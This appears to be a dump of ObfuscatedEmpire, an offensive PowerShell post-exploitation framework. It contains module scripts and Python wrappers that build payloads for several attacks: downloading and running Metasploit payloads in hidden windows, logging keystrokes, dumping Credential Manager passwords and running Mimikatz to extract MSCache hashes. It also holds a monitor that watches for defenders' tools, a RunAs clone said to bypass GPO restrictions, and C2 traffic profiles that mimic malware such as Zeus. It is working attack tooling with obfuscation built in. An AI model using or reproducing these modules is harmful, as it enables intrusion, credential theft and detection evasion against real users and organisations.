/data/module_source/fun/Set-Wallpaper.ps1: 
-------------------------------------------------------------------------------- 1 | # adapted from https://social.technet.microsoft.com/forums/scriptcenter/en-US/9af1769e-197f-4ef3-933f-83cb8f065afb/background-change 2 | 3 | Function Set-WallPaper 4 | { 5 | [CmdletBinding()] Param($WallpaperData) 6 | 7 | $SavePath = "$Env:UserProfile\\AppData\\Local\\wallpaper" + ".jpg" 8 | 9 | Set-Content -value $([System.Convert]::FromBase64String($WallpaperData)) -encoding byte -path $SavePath 10 | 11 | add-type @" 12 | using System; 13 | using System.Runtime.InteropServices; 14 | using Microsoft.Win32; 15 | namespace Wallpaper 16 | { 17 | public enum Style : int 18 | { 19 | Tiled, Centered, Stretched, Fit 20 | } 21 | 22 | 23 | public class Setter { 24 | public const int SetDesktopWallpaper = 20; 25 | public const int UpdateIniFile = 0x01; 26 | public const int SendWinIniChange = 0x02; 27 | 28 | [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] 29 | private static extern int SystemParametersInfo (int uAction, int uParam, string lpvParam, int fuWinIni); 30 | 31 | public static void SetWallpaper ( string path, Wallpaper.Style style ) { 32 | SystemParametersInfo( SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange ); 33 | 34 | RegistryKey key = Registry.CurrentUser.OpenSubKey("Control Panel\\\\Desktop", true); 35 | switch( style ) 36 | { 37 | case Style.Stretched : 38 | key.SetValue(@"WallpaperStyle", "2") ; 39 | key.SetValue(@"TileWallpaper", "0") ; 40 | break; 41 | case Style.Centered : 42 | key.SetValue(@"WallpaperStyle", "1") ; 43 | key.SetValue(@"TileWallpaper", "0") ; 44 | break; 45 | case Style.Tiled : 46 | key.SetValue(@"WallpaperStyle", "1") ; 47 | key.SetValue(@"TileWallpaper", "1") ; 48 | break; 49 | case Style.Fit : 50 | key.SetValue(@"WallpaperStyle", "6") ; 51 | key.SetValue(@"TileWallpaper", "0") ; 52 | break; 53 | } 54 | key.Close(); 55 | } 56 | } 57 | } 58 | "@ 59 | 60 | $null = [Wallpaper.Setter]::SetWallpaper( (Convert-Path 
$SavePath), "Fit" ) 61 | } -------------------------------------------------------------------------------- /data/module_source/management/Invoke-RunAs.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-RunAs { 2 | <# 3 | .DESCRIPTION 4 | Runas knockoff. Will bypass GPO path restrictions. 5 | 6 | .PARAMETER UserName 7 | Provide a user 8 | 9 | .PARAMETER Password 10 | Provide a password 11 | 12 | .PARAMETER Domain 13 | Provide optional domain 14 | 15 | .PARAMETER Cmd 16 | Command to execute. 17 | 18 | .PARAMETER ShowWindow 19 | Show the window being created instead if hiding it (the default). 20 | 21 | .Example 22 | Invoke-RunAs -username administrator -password "P@$$word!" -domain CORPA -Cmd notepad.exe 23 | #> 24 | [CmdletBinding()]Param ( 25 | [Parameter( 26 | ValueFromPipeline=$True)] 27 | [String]$username, 28 | [Parameter( 29 | ValueFromPipeline=$True)] 30 | [String]$password, 31 | [Parameter( 32 | ValueFromPipeline=$True)] 33 | [String]$domain, 34 | [Parameter( 35 | ValueFromPipeline=$True)] 36 | [String]$cmd, 37 | [Parameter()] 38 | [String]$Arguments, 39 | [Parameter()] 40 | [Switch]$ShowWindow 41 | ) 42 | PROCESS { 43 | try{ 44 | $startinfo = new-object System.Diagnostics.ProcessStartInfo 45 | 46 | $startinfo.FileName = $cmd 47 | $startinfo.UseShellExecute = $false 48 | 49 | if(-not ($ShowWindow)) { 50 | $startinfo.CreateNoWindow = $True 51 | $startinfo.WindowStyle = "Hidden" 52 | } 53 | 54 | if($Arguments) { 55 | $startinfo.Arguments = $Arguments 56 | } 57 | 58 | if($UserName) { 59 | # if we're using alternate credentials 60 | $startinfo.UserName = $username 61 | $sec_password = convertto-securestring $password -asplaintext -force 62 | $startinfo.Password = $sec_password 63 | $startinfo.Domain = $domain 64 | } 65 | 66 | [System.Diagnostics.Process]::Start($startinfo) | out-string 67 | } 68 | catch { 69 | "[!] 
Error in runas: $_" 70 | } 71 | 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /data/module_source/situational_awareness/host/Get-SystemDNSServer.ps1: -------------------------------------------------------------------------------- 1 | 2 | function Get-SystemDNSServer 3 | { 4 | <# 5 | .Synopsis 6 | Enumerates the DNS Servers used by a system 7 | Part of Posh-SecMod (https://github.com/darkoperator/Posh-SecMod/) 8 | Author: darkoperator 9 | 10 | .DESCRIPTION 11 | Enumerates the DNS Servers used by a system returning an IP Address .Net object for each. 12 | .EXAMPLE 13 | C:\> Get-SystemDNSServer 14 | Address : 16885952 15 | AddressFamily : InterNetwork 16 | ScopeId : 17 | IsIPv6Multicast : False 18 | IsIPv6LinkLocal : False 19 | IsIPv6SiteLocal : False 20 | IsIPv6Teredo : False 21 | IsIPv4MappedToIPv6 : False 22 | IPAddressToString : 192.168.1.1 23 | #> 24 | $DNSServerAddresses = @() 25 | $interfaces = [System.Net.NetworkInformation.NetworkInterface]::GetAllNetworkInterfaces() 26 | foreach($interface in $interfaces) 27 | { 28 | if($interface.OperationalStatus -eq "Up") 29 | { 30 | $DNSConfig = $interface.GetIPProperties().DnsAddresses 31 | if (!$DNSConfig.IsIPv6SiteLocal) 32 | { 33 | $DNSServerAddresses += $DNSConfig 34 | } 35 | } 36 | } 37 | $DNSServerAddresses 38 | } -------------------------------------------------------------------------------- /data/module_source/situational_awareness/host/Invoke-Paranoia.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-Paranoia { 2 | param( 3 | [String[]] $watchUsers, 4 | [String[]] $watchProcesses, 5 | [String[]] $watchGroups 6 | 7 | ) 8 | 9 | $defaultprocesses = @("taskmgr.exe", "mmc.exe", "wireshark.exe", "tcpview.exe", "procdump.exe", "procexp.exe", "procmon.exe", "netstat.exe", "psloggedon.exe", "logonsessions.exe", "processhacker.exe", "autoruns.exe", "autorunsc.exe") 10 | $watchProcesses = $watchProcesses + 
$defaultprocesses 11 | $defaultgroups = @("Domain Admins") 12 | $watchGroups = $watchGroups + $defaultgroups 13 | $groups_members = @{} 14 | 15 | function get_groupmembers { 16 | param([String[]] $groups) 17 | 18 | $root=([ADSI]"").distinguishedName 19 | $enumd_groups = @{} 20 | $groups | foreach { 21 | $to_search = $_ 22 | $enumd_groups.Add($to_search, @()) 23 | $group = [ADSI]("LDAP://CN=" + $to_search + ", CN=Users,$root") 24 | $group.member|foreach { 25 | $enumd_groups[$to_search] += $_.split(",")[0].split("=")[1] 26 | } 27 | } 28 | return $enumd_groups 29 | } 30 | 31 | function process_proc { 32 | param($proc,$group_members) 33 | $userdom = ($proc.getOwner().Domain + "\" + $proc.getOwner().User).tolower() 34 | $watchUsers | foreach { 35 | if ($userdom -eq $_.tolower()) { 36 | "USER_DETECTED: $userdom : "+ $proc.name + "`n" 37 | } 38 | if ($proc.getOwner().Domain.tolower() -eq $env:COMPUTERNAME -and $proc.getOwner().User.tolower() -eq $_) { 39 | "USER_DETECTED_LOCAL: $userdom : "+ $proc.name + "`n" 40 | } 41 | } 42 | foreach ($group in $group_members.keys) { 43 | foreach ($user in $group_members[$group]) { 44 | if ($proc.getOwner().User.tolower() -eq $user.tolower() -and $proc.getOwner().Domain -ne $env:COMPUTERNAME) { 45 | "USER_DETECTED_GROUP: $userdom : $group :" + $proc.name + "`n" 46 | } 47 | } 48 | } 49 | $watchProcesses | foreach { 50 | if($proc.name.tolower() -eq $_.tolower()) { 51 | "PROCESS_DETECTED: $userdom : " + $proc.name + "`n" 52 | } 53 | } 54 | Get-WmiObject Win32_LogicalDisk | Where-Object {($_.DriveType -eq 2) -and ($_.DeviceID -ne 'A:')} | %{ 55 | if( ($proc.path.split(":")[0]+":").tolower() -eq $_.DeviceID) { 56 | "USB_PROCESS_DETECTED: " + $proc.path + "`n" 57 | } 58 | } 59 | } 60 | 61 | $groups_members = get_groupmembers $watchGroups 62 | 63 | # Main loop 64 | while($True) { 65 | Sleep 3 66 | Get-WmiObject win32_process | %{ 67 | process_proc -proc $_ -group_members $groups_members 68 | } 69 | } 70 | } 71 | 
-------------------------------------------------------------------------------- /data/module_source/situational_awareness/host/Start-MonitorTCPConnections.ps1: -------------------------------------------------------------------------------- 1 | function Start-TCPMonitor { 2 | [cmdletbinding()] 3 | Param( 4 | [Parameter(Mandatory=$true)] 5 | [String]$TargetDomain, 6 | [Parameter(Mandatory=$false)] 7 | [Int]$CheckInterval=30 8 | ) 9 | 10 | Function Get-ActiveTCPConnections { 11 | try { 12 | $TCPProperties = [System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties() 13 | $Connections = $TCPProperties.GetActiveTcpConnections() 14 | return $Connections 15 | 16 | } catch { 17 | Write-Error "Failed to get active connections. $_" 18 | return @() 19 | } 20 | } 21 | 22 | While(1){ 23 | $TargetDomainResolution = [System.Net.Dns]::GetHostAddresses("$TargetDomain") 24 | $TargetIPs = New-Object System.Collections.ArrayList 25 | foreach($i in $TargetDomainResolution ) { 26 | $TargetIPs.Add($i.IPAddressToString.trim()) >$null 2>&1 27 | } 28 | $tcpConns = Get-ActiveTCPConnections 29 | foreach($Connection in $tcpConns) { 30 | foreach($IP in $TargetIPs) { 31 | if( $Connection.RemoteEndPoint.Address.IPAddressToString -eq $IP ) { 32 | "Host connected to $TargetDomain" 33 | } 34 | } 35 | } 36 | 37 | sleep($CheckInterval) 38 | 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /data/module_source/trollsploit/Get-RickAstley.ps1: -------------------------------------------------------------------------------- 1 | # from https://gist.githubusercontent.com/SadProcessor/3e413f9542b01ee90979/raw/463c518c90fca50a2cee594d1b619a0d3fb5bed5/Get-RickAstley.ps1 2 | function Get-RickAstley { 3 | [console]::beep(440,150)#A 4 | [console]::beep(493,150)#B 5 | [console]::beep(587,150)#D 6 | [console]::beep(493,150)#B 7 | Start-Sleep -m 20 8 | [console]::beep(698,400)#F 9 | [console]::beep(698,400)#F 10 | [console]::beep(659,500)#E 11 | 
Start-Sleep -m 50 12 | ## 13 | [console]::beep(440,150)#A 14 | [console]::beep(493,150)#B 15 | [console]::beep(523,150)#C 16 | [console]::beep(444,150)#B 17 | Start-Sleep -m 20 18 | [console]::beep(659,400)#E 19 | [console]::beep(659,400)#E 20 | [console]::beep(587,400)#D 21 | [console]::beep(523,100)#C 22 | [console]::beep(440,100)#A 23 | Start-Sleep -m 50 24 | ## 25 | [console]::beep(440,150)#A 26 | [console]::beep(493,150)#B 27 | [console]::beep(587,150)#D 28 | [console]::beep(493,150)#B 29 | Start-Sleep -m 20 30 | [console]::beep(587,400)#D 31 | [console]::beep(659,400)#E 32 | [console]::beep(523,400)#C 33 | [console]::beep(493,150)#B 34 | [console]::beep(440,150)#A 35 | Start-Sleep -m 20 36 | [console]::beep(440,150)#A 37 | [console]::beep(659,250)#E 38 | [console]::beep(587,250)#D 39 | Start-Sleep -m 200 40 | ## 41 | [console]::beep(440,150)#A 42 | [console]::beep(493,150)#B 43 | [console]::beep(587,150)#D 44 | [console]::beep(493,150)#B 45 | Start-Sleep -m 20 46 | [console]::beep(698,400)#F 47 | [console]::beep(698,400)#F 48 | [console]::beep(659,500)#E 49 | Start-Sleep -m 50 50 | ## 51 | [console]::beep(440,150)#A 52 | [console]::beep(493,150)#B 53 | [console]::beep(523,150)#C 54 | [console]::beep(440,150)#A 55 | Start-Sleep -m 20 56 | [console]::beep(880,600)#A 57 | [console]::beep(523,400)#C 58 | [console]::beep(587,400)#D 59 | [console]::beep(659,100)#E 60 | [console]::beep(587,100)#D 61 | start-sleep -m 50 62 | ## 63 | [console]::beep(440,150)#A 64 | [console]::beep(493,150)#B 65 | [console]::beep(587,150)#D 66 | [console]::beep(493,150)#B 67 | Start-Sleep -m 20 68 | [console]::beep(587,400)#D 69 | [console]::beep(659,400)#E 70 | [console]::beep(523,400)#C 71 | [console]::beep(493,150)#B 72 | [console]::beep(440,150)#A 73 | Start-Sleep -m 50 74 | [console]::beep(440,150)#A 75 | [console]::beep(659,250)#E 76 | [console]::beep(587,250)#D 77 | } -------------------------------------------------------------------------------- 
/data/obfuscated_module_source/code_execution/.gitignore: -------------------------------------------------------------------------------- 1 | *.ps1 2 | -------------------------------------------------------------------------------- /data/obfuscated_module_source/collection/.gitignore: -------------------------------------------------------------------------------- 1 | *.ps1 2 | -------------------------------------------------------------------------------- /data/obfuscated_module_source/collection/vaults/.gitignore: -------------------------------------------------------------------------------- 1 | *.ps1 2 | -------------------------------------------------------------------------------- /data/obfuscated_module_source/credentials/.gitignore: -------------------------------------------------------------------------------- 1 | *.ps1 2 | -------------------------------------------------------------------------------- /data/obfuscated_module_source/exfil/.gitignore: -------------------------------------------------------------------------------- 1 | *.ps1 2 | -------------------------------------------------------------------------------- /data/obfuscated_module_source/exploitation/.gitignore: -------------------------------------------------------------------------------- 1 | *.ps1 2 | -------------------------------------------------------------------------------- /data/obfuscated_module_source/fun/.gitignore: -------------------------------------------------------------------------------- 1 | *.ps1 2 | -------------------------------------------------------------------------------- /data/obfuscated_module_source/lateral_movement/.gitignore: -------------------------------------------------------------------------------- 1 | *.ps1 2 | -------------------------------------------------------------------------------- /data/obfuscated_module_source/management/.gitignore: -------------------------------------------------------------------------------- 1 | *.ps1 2 | 
-------------------------------------------------------------------------------- /data/obfuscated_module_source/persistence/.gitignore: -------------------------------------------------------------------------------- 1 | *.ps1 2 | -------------------------------------------------------------------------------- /data/obfuscated_module_source/privesc/.gitignore: -------------------------------------------------------------------------------- 1 | *.ps1 2 | -------------------------------------------------------------------------------- /data/obfuscated_module_source/recon/.gitignore: -------------------------------------------------------------------------------- 1 | *.ps1 2 | -------------------------------------------------------------------------------- /data/obfuscated_module_source/situational_awareness/.gitignore: -------------------------------------------------------------------------------- 1 | *.ps1 2 | -------------------------------------------------------------------------------- /data/obfuscated_module_source/situational_awareness/host/.gitignore: -------------------------------------------------------------------------------- 1 | *.ps1 2 | -------------------------------------------------------------------------------- /data/obfuscated_module_source/situational_awareness/network/.gitignore: -------------------------------------------------------------------------------- 1 | *.ps1 2 | -------------------------------------------------------------------------------- /data/obfuscated_module_source/trollsploit/.gitignore: -------------------------------------------------------------------------------- 1 | *.ps1 2 | -------------------------------------------------------------------------------- /data/profiles/comfoo.txt: -------------------------------------------------------------------------------- 1 | # Basic comfoo profile 2 | # http://www.secureworks.com/cyber-threat-intelligence/threats/secrets-of-the-comfoo-masters/ 3 | # 
https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/APT/comfoo.profile 4 | 5 | "/CWoNaJLBo/VTNeWw11212/|Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)|Accept:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*|Accept-Language:en-en" -------------------------------------------------------------------------------- /data/profiles/fiesta.txt: -------------------------------------------------------------------------------- 1 | # Fiesta Exploit Kit traffic profile 2 | # http://malware-traffic-analysis.net/2014/04/05/index.html 3 | # https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/crimeware/fiesta.profile 4 | 5 | "/rmvk30g/|Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_11|Accept:text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2" -------------------------------------------------------------------------------- /data/profiles/pitty_tiger.txt: -------------------------------------------------------------------------------- 1 | # Basic Pitty Tiger RAT profile 2 | # http://bitbucket.cassidiancybersecurity.com/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf 3 | # https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/APT/pitty_tiger.profile 4 | 5 | "/FC001/JOHN|Microsoft Internet Explorer" -------------------------------------------------------------------------------- /data/profiles/zeus.txt: -------------------------------------------------------------------------------- 1 | # Basic Zeus variant profile 2 | # https://malwr.com/analysis/NjIwNTU2ODA2OTUxNDcwNmJiMTMzYzk4YzU4NWQyZDQ/ 3 | # https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/crimeware/zeus.profile 4 | 5 | "/metro91/admin/1/ppptp.jpg,/metro91/admin/1/secure.php|Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)|Accept:*/*" -------------------------------------------------------------------------------- /lib/__init__.py: -------------------------------------------------------------------------------- 
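https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/lib/__init__.py
--------------------------------------------------------------------------------
/lib/common/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/lib/common/__init__.py
--------------------------------------------------------------------------------
/lib/modules/powershell/code_execution/invoke_metasploitpayload.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: run a Metasploit web_delivery payload via Invoke-MetasploitPayload."""

    def __init__(self, mainMenu, params=[]):
        # Module metadata shown by the Empire menus.
        self.info = {
            'Name': 'Invoke-MetasploitPayload',
            'Author': ['@jaredhaight'],
            # Adjacent-literal concatenation: each fragment needs its trailing space
            # or the text renders as "downloadsand"/"theexploit".
            'Description': ('Spawns a new, hidden PowerShell window that downloads '
                            'and executes a Metasploit payload. This relies on the '
                            'exploit/multi/scripts/web_delivery metasploit module.'),
            'Background' : False,
            'OutputExtension' : None,
            'NeedsAdmin' : False,
            # NOTE(review): per the description this spawns a new hidden PowerShell
            # process and fetches the payload over the network -- confirm that fits
            # the project's OpsecSafe definition before relying on this flag.
            'OpsecSafe' : True,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': [
                'https://github.com/jaredhaight/Invoke-MetasploitPayload/'
            ]
        }

        # Runtime-settable options: name -> {Description, Required, Value}.
        self.options = {
            'Agent' : {
                'Description' : 'Agent to run Metasploit payload on.',
                'Required' : True,
                'Value' : ''
            },
            'URL' : {
                'Description' : 'URL from the Metasploit web_delivery module',
                'Required' : True,
                'Value' : ''
            }
        }
        # Kept for access to the install path / listeners / agent handlers.
        self.mainMenu = mainMenu

        # params is a list of [Name, Value] pairs; unknown names are ignored.
        for option, value in (params or []):
            if option in self.options:
                self.options[option]['Value'] = value

    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the PowerShell to task the agent with, or "" if the source is unreadable.

        The script is the Invoke-MetasploitPayload source followed by a call line
        built from the non-Agent options. With obfuscate=True the source is
        obfuscated into obfuscated_module_source/ first and the call line is
        obfuscated as well.
        """
        moduleSource = self.mainMenu.installPath + "/data/module_source/code_execution/Invoke-MetasploitPayload.ps1"
        if obfuscate:
            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
        try:
            with open(moduleSource, 'r') as f:
                script = f.read()
        except (IOError, OSError):
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        scriptEnd = "\nInvoke-MetasploitPayload"
        for option, values in self.options.items():
            if option.lower() == "agent":
                continue
            value = values['Value']
            if not value:
                continue
            if str(value).lower() == "true":
                # a bare switch parameter
                scriptEnd += " -" + str(option)
            else:
                # Single-quote the value so characters PowerShell would otherwise
                # interpret (; & $ ( ) whitespace) reach the cmdlet verbatim; a
                # literal single quote is doubled, the escape inside '...'.
                scriptEnd += " -" + str(option) + " '" + str(value).replace("'", "''") + "'"
        if obfuscate:
            scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
        return script + scriptEnd
--------------------------------------------------------------------------------
/lib/modules/powershell/collection/USBKeylogger.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: ETW-based USB keystroke logger (Get-USBKeystrokes)."""

    def __init__(self, mainMenu, params=[]):
        # Module metadata shown by the Empire menus.
        self.info = {
            'Name': 'Get-USBKeyStrokes',
            'Author': ['@Conjectural_hex', '@CyberPoint_SRT'],
            'Description': ('Logs USB keys pressed using Event Tracing for Windows (ETW)'),
            'Background' : True,
            'OutputExtension' : None,
            'NeedsAdmin' : True,
            'OpsecSafe' : True,
            # Every sibling module declares its language; this one was missing it.
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': [
                'https://github.com/CyberPoint/Ruxcon2016ETW/tree/master/KeyloggerPOC',
                'https://github.com/CyberPoint/ETWKeyLogger_PSE',
                'https://ruxcon.org.au/assets/2016/slides/ETW_16_RUXCON_NJR_no_notes.pdf'
            ]
        }

        # Runtime-settable options: name -> {Description, Required, Value}.
        self.options = {
            'Agent' : {
                'Description' : 'Agent to run module on.',
                'Required' : True,
                'Value' : ''
            }
        }
        # Kept for access to the install path / listeners / agent handlers.
        self.mainMenu = mainMenu

        # params is a list of [Name, Value] pairs; unknown names are ignored.
        for option, value in (params or []):
            if option in self.options:
                self.options[option]['Value'] = value

    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the PowerShell to task the agent with, or "" if the source is unreadable.

        Module source plus a "Get-USBKeystrokes [-Option Value ...]" call line; the
        call line starts on its own line so it is never glued to (or commented out
        by) the last line of the .ps1. obfuscate=True obfuscates both parts.
        """
        moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-USBKeystrokes.ps1"
        if obfuscate:
            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
        try:
            with open(moduleSource, 'r') as f:
                script = f.read()
        except (IOError, OSError):
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        scriptEnd = "\nGet-USBKeystrokes"
        for option, values in self.options.items():
            if option.lower() == "agent":
                continue
            value = values['Value']
            if not value:
                continue
            if str(value).lower() == "true":
                # a bare switch parameter
                scriptEnd += " -" + str(option)
            else:
                scriptEnd += " -" + str(option) + " " + str(value)
        if obfuscate:
            scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
        return script + scriptEnd
--------------------------------------------------------------------------------
/lib/modules/powershell/collection/keylogger.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: PowerSploit Get-Keystrokes keylogger."""

    def __init__(self, mainMenu, params=[]):
        # Module metadata shown by the Empire menus.
        self.info = {
            'Name': 'Get-KeyStrokes',
            'Author': ['@obscuresec', '@mattifestation', '@harmj0y'],
            # NOTE(review): "downloads//keystrokes.txt" looks like a template with the
            # agent name missing between the slashes -- confirm against the agent handler.
            'Description': ('Logs keys pressed, time and the active window (when changed) to the keystrokes.txt file. This file is located in the agents downloads directory Empire/downloads//keystrokes.txt.'),
            'Background' : True,
            'OutputExtension' : None,
            'NeedsAdmin' : False,
            'OpsecSafe' : True,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': [
                'https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1'
            ]
        }

        # Runtime-settable options: name -> {Description, Required, Value}.
        self.options = {
            'Agent' : {
                'Description' : 'Agent to run module on.',
                'Required' : True,
                'Value' : ''
            }
        }
        # Kept for access to the install path / listeners / agent handlers.
        self.mainMenu = mainMenu

        # params is a list of [Name, Value] pairs; unknown names are ignored.
        for option, value in (params or []):
            if option in self.options:
                self.options[option]['Value'] = value

    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the PowerShell to task the agent with, or "" if the source is unreadable.

        Module source plus a "Get-Keystrokes [-Option Value ...]" call line.
        obfuscate=True now obfuscates the module source as well as the call line;
        previously only the call line was obfuscated and the clear-text
        Get-Keystrokes.ps1 was shipped regardless of the flag.
        """
        moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-Keystrokes.ps1"
        if obfuscate:
            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
        try:
            with open(moduleSource, 'r') as f:
                script = f.read()
        except (IOError, OSError):
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        scriptEnd = "\nGet-Keystrokes"
        for option, values in self.options.items():
            if option.lower() == "agent":
                continue
            value = values['Value']
            if not value:
                continue
            if str(value).lower() == "true":
                # a bare switch parameter
                scriptEnd += " -" + str(option)
            else:
                scriptEnd += " -" + str(option) + " " + str(value)
        if obfuscate:
            scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
        return script + scriptEnd
--------------------------------------------------------------------------------
/lib/modules/powershell/credentials/enum_cred_store.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: dump the current user's Windows Credential Manager entries."""

    def __init__(self, mainMenu, params=[]):
        # Module metadata shown by the Empire menus.
        self.info = {
            'Name': 'enum_cred_store',
            'Author': ['BeetleChunks'],
            'Description': ('Dumps plaintext credentials from the Windows Credential Manager for the current interactive user.'),
            'Background' : True,
            'OutputExtension' : None,
            'NeedsAdmin' : False,
            'OpsecSafe' : True,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': ['The powershell used is based on JimmyJoeBob Alooba\'s CredMan script.\nhttps://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde']
        }

        # Runtime-settable options: name -> {Description, Required, Value}.
        self.options = {
            'Agent' : {
                'Description' : 'Agent to run module on.',
                'Required' : True,
                'Value' : ''
            }
        }
        # Kept for access to the install path / listeners / agent handlers.
        self.mainMenu = mainMenu

        # params is a list of [Name, Value] pairs; unknown names are ignored.
        for option, value in (params or []):
            if option in self.options:
                self.options[option]['Value'] = value

    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the PowerShell to task the agent with, or "" if the source is unreadable.

        The script is dumpCredStore.ps1 followed by a call to its entry point
        "Invoke-X". obfuscate=True obfuscates both parts.
        """
        moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/dumpCredStore.ps1"
        scriptCmd = "Invoke-X"
        if obfuscate:
            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
        try:
            with open(moduleSource, 'r') as f:
                script = f.read()
        except (IOError, OSError):
            # Was str(scriptPath): an undefined name, so the error path itself
            # raised NameError instead of reporting the bad path.
            print(helpers.color("[!] Unable to open script at the configured path: " + str(moduleSource)))
            return ""

        scriptEnd = "\n%s" % (scriptCmd)
        if obfuscate:
            scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
        return script + scriptEnd
--------------------------------------------------------------------------------
/lib/modules/powershell/credentials/mimikatz/cache.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: Invoke-Mimikatz lsadump::cache (MSCache v2 hashes)."""

    def __init__(self, mainMenu, params=[]):
        # Module metadata shown by the Empire menus.
        self.info = {
            # Was 'Invoke-Mimikatz LSA Dump', the same Name as lsadump.py even
            # though this module dumps the cached domain logons, not the LSA.
            'Name': 'Invoke-Mimikatz Cache Dump',
            'Author': ['@JosephBialek', '@gentilkiwi'],
            'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
                            "to extract MSCache(v2) hashes."),
            'Background' : True,
            'OutputExtension' : None,
            'NeedsAdmin' : True,
            'OpsecSafe' : True,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': [
                'http://clymb3r.wordpress.com/',
                'http://blog.gentilkiwi.com',
                "https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#lsa"
            ]
        }

        # Runtime-settable options: name -> {Description, Required, Value}.
        self.options = {
            'Agent' : {
                'Description' : 'Agent to run module on.',
                'Required' : True,
                'Value' : ''
            }
        }
        # Kept for access to the install path / listeners / agent handlers.
        self.mainMenu = mainMenu

        # params is a list of [Name, Value] pairs; unknown names are ignored.
        for option, value in (params or []):
            if option in self.options:
                self.options[option]['Value'] = value

    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the PowerShell to task the agent with, or "" if the source is unreadable.

        Invoke-Mimikatz source plus a fixed command line; obfuscate=True
        obfuscates both parts.
        """
        moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
        if obfuscate:
            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
        try:
            with open(moduleSource, 'r') as f:
                script = f.read()
        except (IOError, OSError):
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        # token::elevate to SYSTEM (hence NeedsAdmin), read the cache, revert.
        scriptEnd = "\nInvoke-Mimikatz -Command '\"token::elevate\" \"lsadump::cache\" \"token::revert\"';"
        if obfuscate:
            scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
        return script + scriptEnd
--------------------------------------------------------------------------------
/lib/modules/powershell/credentials/mimikatz/certs.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: Invoke-Mimikatz crypto::certificates export."""

    def __init__(self, mainMenu, params=[]):
        # Module metadata shown by the Empire menus.
        self.info = {
            'Name': 'Invoke-Mimikatz DumpCerts',
            'Author': ['@JosephBialek', '@gentilkiwi'],
            # Scoped to what the command in generate() actually targets
            # (/systemstore:local_machine /store:root), not every store on the host.
            'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
                            "to export all certificates in the LOCAL_MACHINE root store to the current directory."),
            'Background' : True,
            'OutputExtension' : None,
            'NeedsAdmin' : True,
            # NOTE(review): /export writes the certificate files to disk in the
            # agent's working directory -- confirm that is acceptable under the
            # project's OpsecSafe definition.
            'OpsecSafe' : True,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': [
                'http://clymb3r.wordpress.com/',
                'http://blog.gentilkiwi.com'
            ]
        }

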